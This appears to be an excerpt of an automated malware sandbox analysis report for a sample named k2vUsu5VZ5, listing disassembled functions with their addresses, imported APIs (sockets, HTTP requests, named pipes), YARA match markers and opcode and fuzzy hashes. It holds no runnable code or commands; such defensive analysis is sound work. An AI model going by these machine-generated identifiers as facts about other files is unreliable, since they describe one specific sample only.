                Download Yara Rule
                APIs
                Memory Dump Source
                • Source File: 00000000.00000002.4095150845.0000000003480000.00000040.00001000.00020000.00000000.sdmp, Offset: 03480000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_3480000_k2vUsu5VZ5.jbxd
                Yara matches
                Similarity
                • API ID: _initp_misc_winsig
                • String ID:
                • API String ID: 2710132595-0
                • Opcode ID: f5eeccd02aae99182859cd355c685068cf330a2df8fc0dd784810881261ec21a
                • Instruction ID: fcaa67a26f90b0433caed9341e3780681373da8f6ca1427c99b19b746efcd926
                • Opcode Fuzzy Hash: f5eeccd02aae99182859cd355c685068cf330a2df8fc0dd784810881261ec21a
                • Instruction Fuzzy Hash: 8EA1C531609E098FEF54FF75E898AAA37F2F3A8301721893A904AD7274DA7CD555CB40
                Function 038ABAB0 Relevance: .6, Instructions: 617COMMON
                Download Yara Rule
                Memory Dump Source
                • Source File: 00000000.00000002.4095284653.0000000003880000.00000040.00001000.00020000.00000000.sdmp, Offset: 03880000, based on PE: true
                • Associated: 00000000.00000002.4095284653.00000000038C5000.00000040.00001000.00020000.00000000.sdmpDownload File
                • Associated: 00000000.00000002.4095284653.00000000038C8000.00000040.00001000.00020000.00000000.sdmpDownload File
                • Associated: 00000000.00000002.4095284653.00000000038CC000.00000040.00001000.00020000.00000000.sdmpDownload File
                • Associated: 00000000.00000002.4095284653.00000000038D0000.00000040.00001000.00020000.00000000.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_3880000_k2vUsu5VZ5.jbxd
                Yara matches
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: a07843770b9451d4ac558cc520e1e60a991d7943e83801c352df3725012db3a9
                • Instruction ID: 1c0305891f80c3e59678ace8965420d70f08e0584d6e72ee67099ee0b54510c7
                • Opcode Fuzzy Hash: a07843770b9451d4ac558cc520e1e60a991d7943e83801c352df3725012db3a9
                • Instruction Fuzzy Hash: 37523EB2214A418BD708CF1DE4A173AB7E1F3C9B81F44852AE79B8B799CE2DD554CB40
                Function 038AB140 Relevance: .6, Instructions: 592COMMON
                Download Yara Rule
                Memory Dump Source
                • Source File: 00000000.00000002.4095284653.0000000003880000.00000040.00001000.00020000.00000000.sdmp, Offset: 03880000, based on PE: true
                • Associated: 00000000.00000002.4095284653.00000000038C5000.00000040.00001000.00020000.00000000.sdmpDownload File
                • Associated: 00000000.00000002.4095284653.00000000038C8000.00000040.00001000.00020000.00000000.sdmpDownload File
                • Associated: 00000000.00000002.4095284653.00000000038CC000.00000040.00001000.00020000.00000000.sdmpDownload File
                • Associated: 00000000.00000002.4095284653.00000000038D0000.00000040.00001000.00020000.00000000.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_3880000_k2vUsu5VZ5.jbxd
                Yara matches
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 7e962665f58d5d5727d455e658583aa4da8621b5749926b7e243a7ad70d2d8bb
                • Instruction ID: 61b9068e0bcfe1087f3f935147b29fa9b5ff1523f787ec604bbe9d179b7c3728
                • Opcode Fuzzy Hash: 7e962665f58d5d5727d455e658583aa4da8621b5749926b7e243a7ad70d2d8bb
                • Instruction Fuzzy Hash: A45241B2214A818BD708CF1DE4A173AB7E1F3C9B80F44852AE7968B799CE3DD545CB40
                Function 0348CBCB Relevance: .6, Instructions: 560COMMONLIBRARYCODE
                Download Yara Rule
                Memory Dump Source
                • Source File: 00000000.00000002.4095150845.0000000003480000.00000040.00001000.00020000.00000000.sdmp, Offset: 03480000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_3480000_k2vUsu5VZ5.jbxd
                Yara matches
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 364b806096a3aa3b8234d976ad9a261243ac4bd49e8b4c0c2da675f77400e73a
                • Instruction ID: 5e5100da58fec375993545b0088b8636c04de6e1eb7fb8b8397f0937e6cbac04
                • Opcode Fuzzy Hash: 364b806096a3aa3b8234d976ad9a261243ac4bd49e8b4c0c2da675f77400e73a
                • Instruction Fuzzy Hash: 5F02B535614F094FEB64EB79C8817A6B3E1FB99305F184A3EC48BDB251EA78E4428744
                Function 0388A280 Relevance: .4, Instructions: 404COMMON
                Download Yara Rule
                Memory Dump Source
                • Source File: 00000000.00000002.4095284653.0000000003880000.00000040.00001000.00020000.00000000.sdmp, Offset: 03880000, based on PE: true
                • Associated: 00000000.00000002.4095284653.00000000038C5000.00000040.00001000.00020000.00000000.sdmpDownload File
                • Associated: 00000000.00000002.4095284653.00000000038C8000.00000040.00001000.00020000.00000000.sdmpDownload File
                • Associated: 00000000.00000002.4095284653.00000000038CC000.00000040.00001000.00020000.00000000.sdmpDownload File
                • Associated: 00000000.00000002.4095284653.00000000038D0000.00000040.00001000.00020000.00000000.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_3880000_k2vUsu5VZ5.jbxd
                Yara matches
                Similarity
                • API ID: free
                • String ID:
                • API String ID: 1294909896-0
                • Opcode ID: b67124fcb2800aa71cf4167183ed8b7006b8efeaee0b8cde1c514a40c820f159
                • Instruction ID: 1ae68eedfadaf16bbddec225d1712316f8f5a05b7c16ac001e6360bd80c3eada
                • Opcode Fuzzy Hash: b67124fcb2800aa71cf4167183ed8b7006b8efeaee0b8cde1c514a40c820f159
                • Instruction Fuzzy Hash: A3E1B876304A4292DB24FBA9E49026E63B5F784788F944196EF4DC7798EF3CC946CB40
                Function 03889D6C Relevance: .4, Instructions: 367COMMON
                Download Yara Rule
                Memory Dump Source
                • Source File: 00000000.00000002.4095284653.0000000003880000.00000040.00001000.00020000.00000000.sdmp, Offset: 03880000, based on PE: true
                • Associated: 00000000.00000002.4095284653.00000000038C5000.00000040.00001000.00020000.00000000.sdmpDownload File
                • Associated: 00000000.00000002.4095284653.00000000038C8000.00000040.00001000.00020000.00000000.sdmpDownload File
                • Associated: 00000000.00000002.4095284653.00000000038CC000.00000040.00001000.00020000.00000000.sdmpDownload File
                • Associated: 00000000.00000002.4095284653.00000000038D0000.00000040.00001000.00020000.00000000.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_3880000_k2vUsu5VZ5.jbxd
                Yara matches
                Similarity
                • API ID: free
                • String ID:
                • API String ID: 1294909896-0
                • Opcode ID: 6e0cad8a379a87a43e3685a9d50e1c13f48f381bc0b4980d77a4960bd609250d
                • Instruction ID: 6e818fe075d0159448dae44583916cf504a8e9527c34da65e2221881c9ef6e34
                • Opcode Fuzzy Hash: 6e0cad8a379a87a43e3685a9d50e1c13f48f381bc0b4980d77a4960bd609250d
                • Instruction Fuzzy Hash: 23D11577304B4292DF20FBE9D4902AEA765F784798B940092EF4EDBA98EF39C545C740
                Function 038AAE57 Relevance: .1, Instructions: 134COMMON
                Download Yara Rule
                Memory Dump Source
                • Source File: 00000000.00000002.4095284653.0000000003880000.00000040.00001000.00020000.00000000.sdmp, Offset: 03880000, based on PE: true
                • Associated: 00000000.00000002.4095284653.00000000038C5000.00000040.00001000.00020000.00000000.sdmpDownload File
                • Associated: 00000000.00000002.4095284653.00000000038C8000.00000040.00001000.00020000.00000000.sdmpDownload File
                • Associated: 00000000.00000002.4095284653.00000000038CC000.00000040.00001000.00020000.00000000.sdmpDownload File
                • Associated: 00000000.00000002.4095284653.00000000038D0000.00000040.00001000.00020000.00000000.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_3880000_k2vUsu5VZ5.jbxd
                Yara matches
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 8fee81b4d80be5685d5198290934ea415fe98b51e4b7cf41c28b3c9105e8cbe7
                • Instruction ID: 58516e6d82096454b4466fe21d57e7bfe36c54b254dc3aed28093c5ff7a77a61
                • Opcode Fuzzy Hash: 8fee81b4d80be5685d5198290934ea415fe98b51e4b7cf41c28b3c9105e8cbe7
                • Instruction Fuzzy Hash: 4451DCB6214A508BD754CF1DE4A072AB7E1F3CCB94F84521AE78A87768DB3CDA45CB40
                Function 038B0020 Relevance: .0, Instructions: 33COMMONLIBRARYCODE
                Download Yara Rule
                Memory Dump Source
                • Source File: 00000000.00000002.4095284653.0000000003880000.00000040.00001000.00020000.00000000.sdmp, Offset: 03880000, based on PE: true
                • Associated: 00000000.00000002.4095284653.00000000038C5000.00000040.00001000.00020000.00000000.sdmpDownload File
                • Associated: 00000000.00000002.4095284653.00000000038C8000.00000040.00001000.00020000.00000000.sdmpDownload File
                • Associated: 00000000.00000002.4095284653.00000000038CC000.00000040.00001000.00020000.00000000.sdmpDownload File
                • Associated: 00000000.00000002.4095284653.00000000038D0000.00000040.00001000.00020000.00000000.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_3880000_k2vUsu5VZ5.jbxd
                Yara matches
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 631e00ee86122774a76d4c4546931208e2a5acf43f22eb3aca0d673cc5843e65
                • Instruction ID: 8057a9608bedd03cd99877d42bf7bd6390574a024114ed2e65eed35343cfe8e4
                • Opcode Fuzzy Hash: 631e00ee86122774a76d4c4546931208e2a5acf43f22eb3aca0d673cc5843e65
                • Instruction Fuzzy Hash: 87F019C7E5DAD24AD223D7A40C781DE2FB2A4B681134DC0CF8A44CB743E50604079712
                Function 038B0630 Relevance: .0, Instructions: 13COMMONLIBRARYCODE
                Download Yara Rule
                Memory Dump Source
                • Source File: 00000000.00000002.4095284653.0000000003880000.00000040.00001000.00020000.00000000.sdmp, Offset: 03880000, based on PE: true
                • Associated: 00000000.00000002.4095284653.00000000038C5000.00000040.00001000.00020000.00000000.sdmpDownload File
                • Associated: 00000000.00000002.4095284653.00000000038C8000.00000040.00001000.00020000.00000000.sdmpDownload File
                • Associated: 00000000.00000002.4095284653.00000000038CC000.00000040.00001000.00020000.00000000.sdmpDownload File
                • Associated: 00000000.00000002.4095284653.00000000038D0000.00000040.00001000.00020000.00000000.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_3880000_k2vUsu5VZ5.jbxd
                Yara matches
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 346746c420873f5115eefdb694fe7c4ecc9345e885989bf490d76ed756ab699a
                • Instruction ID: b276c100a618e21ce492357e2446017176c8b4b0dbb315afa1f50c5de1a71b89
                • Opcode Fuzzy Hash: 346746c420873f5115eefdb694fe7c4ecc9345e885989bf490d76ed756ab699a
                • Instruction Fuzzy Hash: B3D05ECBE5DBD349E366C3A84C2C28E2F72A1E382074C80CF87448E392E64A1401C311
                Function 038B0050 Relevance: .0, Instructions: 10COMMONLIBRARYCODE
                Download Yara Rule
                Memory Dump Source
                • Source File: 00000000.00000002.4095284653.0000000003880000.00000040.00001000.00020000.00000000.sdmp, Offset: 03880000, based on PE: true
                • Associated: 00000000.00000002.4095284653.00000000038C5000.00000040.00001000.00020000.00000000.sdmpDownload File
                • Associated: 00000000.00000002.4095284653.00000000038C8000.00000040.00001000.00020000.00000000.sdmpDownload File
                • Associated: 00000000.00000002.4095284653.00000000038CC000.00000040.00001000.00020000.00000000.sdmpDownload File
                • Associated: 00000000.00000002.4095284653.00000000038D0000.00000040.00001000.00020000.00000000.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_3880000_k2vUsu5VZ5.jbxd
                Yara matches
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 7077a8aff73e726294d064c0100d8d9a6f69cbf49f20d4d8a9feb05e8568bc26
                • Instruction ID: 838e0d35cd9232a0f2a1d42b5f37fe44f6142018ddcfc68db82b5a699939d207
                • Opcode Fuzzy Hash: 7077a8aff73e726294d064c0100d8d9a6f69cbf49f20d4d8a9feb05e8568bc26
                • Instruction Fuzzy Hash: 05C04C97A149D187D7129A5408A51952B63E5D2C3238E82D98D9187E43510A6817A311
                Function 038B04F0 Relevance: .0, Instructions: 10COMMONLIBRARYCODE
                Download Yara Rule
                Memory Dump Source
                • Source File: 00000000.00000002.4095284653.0000000003880000.00000040.00001000.00020000.00000000.sdmp, Offset: 03880000, based on PE: true
                • Associated: 00000000.00000002.4095284653.00000000038C5000.00000040.00001000.00020000.00000000.sdmpDownload File
                • Associated: 00000000.00000002.4095284653.00000000038C8000.00000040.00001000.00020000.00000000.sdmpDownload File
                • Associated: 00000000.00000002.4095284653.00000000038CC000.00000040.00001000.00020000.00000000.sdmpDownload File
                • Associated: 00000000.00000002.4095284653.00000000038D0000.00000040.00001000.00020000.00000000.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_3880000_k2vUsu5VZ5.jbxd
                Yara matches
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: e22b888f4c5b362cda7f8ac34c3812d6ca885ba57bea4ef0bbaaf1add4c6c28a
                • Instruction ID: 71b433a99c172f529f5ff5a09c463be7f4425a949e62f20f949fdf9a882c0cd2
                • Opcode Fuzzy Hash: e22b888f4c5b362cda7f8ac34c3812d6ca885ba57bea4ef0bbaaf1add4c6c28a
                • Instruction Fuzzy Hash: FDC012DBE5DEC58AE323C1940C6405F2EB294B281431E8086CF4856351A24608004251
                Function 00402F69 Relevance: .0, Instructions: 4COMMON
                Download Yara Rule
                Memory Dump Source
                • Source File: 00000000.00000002.4094583277.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000000.00000002.4094558739.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.4094583277.000000000040C000.00000040.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.4094629675.000000000040D000.00000080.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.4094651561.000000000040E000.00000040.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.4094673415.000000000040F000.00000004.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_400000_k2vUsu5VZ5.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 19992302b57e0ae1e896caf69d358159d2cdd7c295cfb7410856e5c68f34a958
                • Instruction ID: 82f505fb4451acb9e8d1e12f81e5a21f5fcc3540fe401e05c5c992db50528185
                • Opcode Fuzzy Hash: 19992302b57e0ae1e896caf69d358159d2cdd7c295cfb7410856e5c68f34a958
                • Instruction Fuzzy Hash: 62A0029244DD0290E3101B40D9413A07279D306240F0424A6421461072853D8520414C
                Function 03895268 Relevance: 22.7, APIs: 15, Instructions: 195networkCOMMONLIBRARYCODE
                Download Yara Rule
                APIs
                Memory Dump Source
                • Source File: 00000000.00000002.4095284653.0000000003880000.00000040.00001000.00020000.00000000.sdmp, Offset: 03880000, based on PE: true
                • Associated: 00000000.00000002.4095284653.00000000038C5000.00000040.00001000.00020000.00000000.sdmpDownload File
                • Associated: 00000000.00000002.4095284653.00000000038C8000.00000040.00001000.00020000.00000000.sdmpDownload File
                • Associated: 00000000.00000002.4095284653.00000000038CC000.00000040.00001000.00020000.00000000.sdmpDownload File
                • Associated: 00000000.00000002.4095284653.00000000038D0000.00000040.00001000.00020000.00000000.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_3880000_k2vUsu5VZ5.jbxd
                Yara matches
                Similarity
                • API ID: acceptioctlsocket$closesockethtonlselect
                • String ID:
                • API String ID: 2003300010-0
                • Opcode ID: 7628e35ad2332fee6b739d1ce5eb7cb20470cee2d2913517aafaa3cc703533d7
                • Instruction ID: 2ec000449dc608a1f616ed3f45a7344c69a3a2ded901e5911045141152cbb305
                • Opcode Fuzzy Hash: 7628e35ad2332fee6b739d1ce5eb7cb20470cee2d2913517aafaa3cc703533d7
                • Instruction Fuzzy Hash: 9D91BC72710B919AEB21DFA5E9403AD73A5F788798F044166EB4D8BE58DF38C264CB00
                Function 0389A328 Relevance: 19.7, APIs: 13, Instructions: 238stringCOMMONLIBRARYCODE
                Download Yara Rule
                APIs
                Memory Dump Source
                • Source File: 00000000.00000002.4095284653.0000000003880000.00000040.00001000.00020000.00000000.sdmp, Offset: 03880000, based on PE: true
                • Associated: 00000000.00000002.4095284653.00000000038C5000.00000040.00001000.00020000.00000000.sdmpDownload File
                • Associated: 00000000.00000002.4095284653.00000000038C8000.00000040.00001000.00020000.00000000.sdmpDownload File
                • Associated: 00000000.00000002.4095284653.00000000038CC000.00000040.00001000.00020000.00000000.sdmpDownload File
                • Associated: 00000000.00000002.4095284653.00000000038D0000.00000040.00001000.00020000.00000000.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_3880000_k2vUsu5VZ5.jbxd
                Yara matches
                Similarity
                • API ID: strtok$malloc$_time64$ErrorFreeHeapLast_errno_getptdfree
                • String ID:
                • API String ID: 620445413-0
                • Opcode ID: d25b6128ed1f2a7143d718cd71c0dc24c777b6b99499086e71dd0509d51768d1
                • Instruction ID: 563482f5d5c7a436352c0fc8523dfbb67e9e271fd5d9e10c26f7d2e86e023a58
                • Opcode Fuzzy Hash: d25b6128ed1f2a7143d718cd71c0dc24c777b6b99499086e71dd0509d51768d1
                • Instruction Fuzzy Hash: 11A191B1221B8886FF1ACF95F84471577A8F744764F08A2EAE9258B7A4CF3CC651C714
                Function 0388E8D8 Relevance: 19.4, APIs: 9, Strings: 2, Instructions: 130networksleepCOMMONLIBRARYCODE
                Download Yara Rule
                APIs
                • _snprintf.LIBCMT ref: 0388E975
                  • Part of subcall function 0389D57C: _errno.LIBCMT ref: 0389D5B3
                  • Part of subcall function 0389D57C: _invalid_parameter_noinfo.LIBCMT ref: 0389D5BE
                • _snprintf.LIBCMT ref: 0388E991
                • _snprintf.LIBCMT ref: 0388EA07
                • _snprintf.LIBCMT ref: 0388EA1E
                  • Part of subcall function 0389D57C: _flsbuf.LIBCMT ref: 0389D61D
                • HttpOpenRequestA.WININET ref: 0388EA6A
                • HttpSendRequestA.WININET ref: 0388EA9D
                • InternetCloseHandle.WININET ref: 0388EAB2
                • Sleep.KERNEL32 ref: 0388EABD
                • InternetCloseHandle.WININET ref: 0388EAD0
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.4095284653.0000000003880000.00000040.00001000.00020000.00000000.sdmp, Offset: 03880000, based on PE: true
                • Associated: 00000000.00000002.4095284653.00000000038C5000.00000040.00001000.00020000.00000000.sdmpDownload File
                • Associated: 00000000.00000002.4095284653.00000000038C8000.00000040.00001000.00020000.00000000.sdmpDownload File
                • Associated: 00000000.00000002.4095284653.00000000038CC000.00000040.00001000.00020000.00000000.sdmpDownload File
                • Associated: 00000000.00000002.4095284653.00000000038D0000.00000040.00001000.00020000.00000000.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_3880000_k2vUsu5VZ5.jbxd
                Yara matches
                Similarity
                • API ID: _snprintf$CloseHandleHttpInternetRequest$OpenSendSleep_errno_flsbuf_invalid_parameter_noinfo
                • String ID: %s%s$*/*
                • API String ID: 3364845851-856325523
                • Opcode ID: 4d3adaf88e9e90db0637c378f7c191c0bc30314f5d8357b9e67139d4a27a59b8
                • Instruction ID: bca9c79ea6f689030b8ed6009054b953986989188b6052acf14f8b012b5a9715
                • Opcode Fuzzy Hash: 4d3adaf88e9e90db0637c378f7c191c0bc30314f5d8357b9e67139d4a27a59b8
                • Instruction Fuzzy Hash: DC51D4B6704B85CAEB00DFA5E84039DB3B4F788798F5881A6DA4D97764EF38C609C711
                Function 03893B34 Relevance: 18.1, APIs: 12, Instructions: 105pipesleepfileCOMMON
                Download Yara Rule
                APIs
                Memory Dump Source
                • Source File: 00000000.00000002.4095284653.0000000003880000.00000040.00001000.00020000.00000000.sdmp, Offset: 03880000, based on PE: true
                • Associated: 00000000.00000002.4095284653.00000000038C5000.00000040.00001000.00020000.00000000.sdmpDownload File
                • Associated: 00000000.00000002.4095284653.00000000038C8000.00000040.00001000.00020000.00000000.sdmpDownload File
                • Associated: 00000000.00000002.4095284653.00000000038CC000.00000040.00001000.00020000.00000000.sdmpDownload File
                • Associated: 00000000.00000002.4095284653.00000000038D0000.00000040.00001000.00020000.00000000.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_3880000_k2vUsu5VZ5.jbxd
                Yara matches
                Similarity
                • API ID: ErrorLast$CountNamedPipeTick$CreateDisconnectFileHandleSleepStateWait
                • String ID:
                • API String ID: 34948862-0
                • Opcode ID: 1fbeea9be532b9f33a7578d86157401c58637eb984225940b498093461a2244d
                • Instruction ID: c247a80da34b013dd3a3d56dcf71faf4239847d69b5e2b5ca30d373cd6ee6747
                • Opcode Fuzzy Hash: 1fbeea9be532b9f33a7578d86157401c58637eb984225940b498093461a2244d
                • Instruction Fuzzy Hash: 0A418F7A700B0186FB11DBA1E85436E7379F788BA4F4882A2EE5E87B94CF78C545C300
                Function 0389DEAC Relevance: 18.1, APIs: 12, Instructions: 73COMMONLIBRARYCODE
                Download Yara Rule
                APIs
                Memory Dump Source
                • Source File: 00000000.00000002.4095284653.0000000003880000.00000040.00001000.00020000.00000000.sdmp, Offset: 03880000, based on PE: true
                • Associated: 00000000.00000002.4095284653.00000000038C5000.00000040.00001000.00020000.00000000.sdmpDownload File
                • Associated: 00000000.00000002.4095284653.00000000038C8000.00000040.00001000.00020000.00000000.sdmpDownload File
                • Associated: 00000000.00000002.4095284653.00000000038CC000.00000040.00001000.00020000.00000000.sdmpDownload File
                • Associated: 00000000.00000002.4095284653.00000000038D0000.00000040.00001000.00020000.00000000.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_3880000_k2vUsu5VZ5.jbxd
                Yara matches
                Similarity
                • API ID: free$Pointer$DecodeEncodeErrorFreeHeapLast_errno
                • String ID:
                • API String ID: 4099253644-0
                • Opcode ID: 414a355009f71752a80ca6a1a86f772915b575b7b474327a6fec3fd0861578bf
                • Instruction ID: 28d9ca8ff9dcaa93af3562039abedc1fa60bbcd9f63a0bf35ef3076ebec97822
                • Opcode Fuzzy Hash: 414a355009f71752a80ca6a1a86f772915b575b7b474327a6fec3fd0861578bf
                • Instruction Fuzzy Hash: A131B626611B0486FF07DF96FC613686368BB45B90F1C91E7E91A8B250CF3CC1488329
                Function 0389DD50 Relevance: 18.1, APIs: 12, Instructions: 73COMMONLIBRARYCODE
                Download Yara Rule
                APIs
                • _errno.LIBCMT ref: 0389DD76
                  • Part of subcall function 0389FBCC: _getptd_noexit.LIBCMT ref: 0389FBD0
                • _invalid_parameter_noinfo.LIBCMT ref: 0389DD82
                • __crtIsPackagedApp.LIBCMT ref: 0389DD93
                • AreFileApisANSI.KERNEL32 ref: 0389DDA2
                • MultiByteToWideChar.KERNEL32 ref: 0389DDC8
                • GetLastError.KERNEL32 ref: 0389DDD5
                • _dosmaperr.LIBCMT ref: 0389DDDD
                Memory Dump Source
                • Source File: 00000000.00000002.4095284653.0000000003880000.00000040.00001000.00020000.00000000.sdmp, Offset: 03880000, based on PE: true
                • Associated: 00000000.00000002.4095284653.00000000038C5000.00000040.00001000.00020000.00000000.sdmpDownload File
                • Associated: 00000000.00000002.4095284653.00000000038C8000.00000040.00001000.00020000.00000000.sdmpDownload File
                • Associated: 00000000.00000002.4095284653.00000000038CC000.00000040.00001000.00020000.00000000.sdmpDownload File
                • Associated: 00000000.00000002.4095284653.00000000038D0000.00000040.00001000.00020000.00000000.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_3880000_k2vUsu5VZ5.jbxd
                Yara matches
                Similarity
                • API ID: ApisByteCharErrorFileLastMultiPackagedWide__crt_dosmaperr_errno_getptd_noexit_invalid_parameter_noinfo
                • String ID:
                • API String ID: 1138158220-0
                • Opcode ID: 45c80a8bb1a54d9da36eca88e3e5dd067c6ff5e0ef366819f7a7bb07a5a81634
                • Instruction ID: cf46d46f89d2561a1104a1f577a9935c02ca8bb9bd35f6b13fe50598ebcb8ff0
                • Opcode Fuzzy Hash: 45c80a8bb1a54d9da36eca88e3e5dd067c6ff5e0ef366819f7a7bb07a5a81634
                • Instruction Fuzzy Hash: 33219276300F4186FF15EFBAD81432DA7A5BB88B94F0C86A69A49C77A4EF38C104C715
                Function 03895990 Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 73networkCOMMON
                Download Yara Rule
                APIs
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.4095284653.0000000003880000.00000040.00001000.00020000.00000000.sdmp, Offset: 03880000, based on PE: true
                • Associated: 00000000.00000002.4095284653.00000000038C5000.00000040.00001000.00020000.00000000.sdmpDownload File
                • Associated: 00000000.00000002.4095284653.00000000038C8000.00000040.00001000.00020000.00000000.sdmpDownload File
                • Associated: 00000000.00000002.4095284653.00000000038CC000.00000040.00001000.00020000.00000000.sdmpDownload File
                • Associated: 00000000.00000002.4095284653.00000000038D0000.00000040.00001000.00020000.00000000.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_3880000_k2vUsu5VZ5.jbxd
                Yara matches
                Similarity
                • API ID: CountTick$gethostbynamehtonsinet_addrselectsendto
                • String ID: d
                • API String ID: 1257931466-2564639436
                • Opcode ID: a246aa495eb1010205a87a75c0c1794da7582316548824e43cfe3d206ef98d68
                • Instruction ID: eb895cdabe14cfab85f135555b6f41e5061936b571dd44306ac352c4527767f8
                • Opcode Fuzzy Hash: a246aa495eb1010205a87a75c0c1794da7582316548824e43cfe3d206ef98d68
                • Instruction Fuzzy Hash: A231C472215B85C6EB61CF61E88479EB3A8F788B88F044166EE8D47F18DF78C655CB40
                Function 034A4123 Relevance: 16.6, APIs: 11, Instructions: 108COMMONLIBRARYCODE
                Download Yara Rule
                APIs
                • _errno.LIBCMT ref: 034A4155
                  • Part of subcall function 0349F013: _getptd_noexit.LIBCMT ref: 0349F017
                • __doserrno.LIBCMT ref: 034A414C
                  • Part of subcall function 0349EFA3: _getptd_noexit.LIBCMT ref: 0349EFA7
                • __doserrno.LIBCMT ref: 034A41B2
                • _errno.LIBCMT ref: 034A41B9
                • _invalid_parameter_noinfo.LIBCMT ref: 034A421D
                Memory Dump Source
                • Source File: 00000000.00000002.4095150845.0000000003480000.00000040.00001000.00020000.00000000.sdmp, Offset: 03480000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_3480000_k2vUsu5VZ5.jbxd
                Yara matches
                Similarity
                • API ID: __doserrno_errno_getptd_noexit$_invalid_parameter_noinfo
                • String ID:
                • API String ID: 388111225-0
                • Opcode ID: f1e83107c3560ebd634bf603a2dc03616e82e6e5f746a5e0c4714b1d3544e5b9
                • Instruction ID: 420583c5bbfb9aae928b5c576fa7b7ac7d0cb8cdc76ce04c22c18c404bf10de7
                • Opcode Fuzzy Hash: f1e83107c3560ebd634bf603a2dc03616e82e6e5f746a5e0c4714b1d3544e5b9
                • Instruction Fuzzy Hash: D7313A71608B044EE728EFAE988123D3BD4EB95260F01065FD4268F3A1D6B09C424399
                Function 03895884 Relevance: 15.8, APIs: 8, Strings: 1, Instructions: 57networksleepCOMMON
                Download Yara Rule
                APIs
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.4095284653.0000000003880000.00000040.00001000.00020000.00000000.sdmp, Offset: 03880000, based on PE: true
                • Associated: 00000000.00000002.4095284653.00000000038C5000.00000040.00001000.00020000.00000000.sdmpDownload File
                • Associated: 00000000.00000002.4095284653.00000000038C8000.00000040.00001000.00020000.00000000.sdmpDownload File
                • Associated: 00000000.00000002.4095284653.00000000038CC000.00000040.00001000.00020000.00000000.sdmpDownload File
                • Associated: 00000000.00000002.4095284653.00000000038D0000.00000040.00001000.00020000.00000000.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_3880000_k2vUsu5VZ5.jbxd
                Yara matches
                Similarity
                • API ID: CountTick$ErrorLastSleepselectsend
                • String ID: d
                • API String ID: 2152284305-2564639436
                • Opcode ID: 5b27ba0d8d607714712b298a6346cf3fa52a79f11e24ee9ada0824c07ae7a3d6
                • Instruction ID: b6334d15ad05e3b8175128ca454186b85e7054f9fec5b0534b7a16b13b810d86
                • Opcode Fuzzy Hash: 5b27ba0d8d607714712b298a6346cf3fa52a79f11e24ee9ada0824c07ae7a3d6
                • Instruction Fuzzy Hash: 95219072218B8186EB61CF61F88438EB368F788B94F4441A6EBDD87E54DF38C559CB40
                Function 034A4F0F Relevance: 15.1, APIs: 10, Instructions: 93COMMONLIBRARYCODE
                Download Yara Rule
                APIs
                • _errno.LIBCMT ref: 034A4F3A
                  • Part of subcall function 0349F013: _getptd_noexit.LIBCMT ref: 0349F017
                • __doserrno.LIBCMT ref: 034A4F32
                  • Part of subcall function 0349EFA3: _getptd_noexit.LIBCMT ref: 0349EFA7
                • __lock_fhandle.LIBCMT ref: 034A4F7E
                • _lseeki64_nolock.LIBCMT ref: 034A4F97
                • _unlock_fhandle.LIBCMT ref: 034A4FBA
                Memory Dump Source
                • Source File: 00000000.00000002.4095150845.0000000003480000.00000040.00001000.00020000.00000000.sdmp, Offset: 03480000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_3480000_k2vUsu5VZ5.jbxd
                Yara matches
                Similarity
                • API ID: _getptd_noexit$__doserrno__lock_fhandle_errno_lseeki64_nolock_unlock_fhandle
                • String ID:
                • API String ID: 2644381645-0
                • Opcode ID: 3dd1f773b3794dac3aa2364f63410e61f96c4d43ad1712998e2299525dae883a
